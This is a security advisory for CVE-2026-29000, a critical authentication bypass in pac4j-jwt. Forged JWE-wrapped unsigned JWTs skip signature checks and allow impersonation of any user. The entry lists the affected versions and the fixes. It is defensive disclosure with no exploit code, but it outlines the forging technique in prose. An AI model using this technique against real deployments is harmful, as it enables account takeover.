PT-2026-23074 · Pac4J-Jwt · Pac4J-Jwt
Amartya Jha
·
Published
2026-03-04
·
Updated
2026-05-27
·
CVE-2026-29000
CVSS v3.1
10
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L |
Name of the Vulnerable Software and Affected Versions
pac4j-jwt versions prior to 4.5.9
pac4j-jwt versions prior to 5.7.9
pac4j-jwt versions prior to 6.3.3
Description
An authentication bypass exists in the
JwtAuthenticator component when processing encrypted JSON Web Tokens (JWTs). Remote attackers possessing the server's RSA public key can forge authentication tokens by creating a JWE-wrapped PlainJWT (an unsigned JWT) containing arbitrary subject and role claims. Because the library improperly handles these tokens, it skips the signature verification process, allowing the attacker to impersonate any user, including administrators.Recommendations
Update pac4j-jwt to version 4.5.9 or later.
Update pac4j-jwt to version 5.7.9 or later.
Update pac4j-jwt to version 6.3.3 or later.
Exploit
Fix
Improper Verification of Cryptographic Signature
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Pac4J-Jwt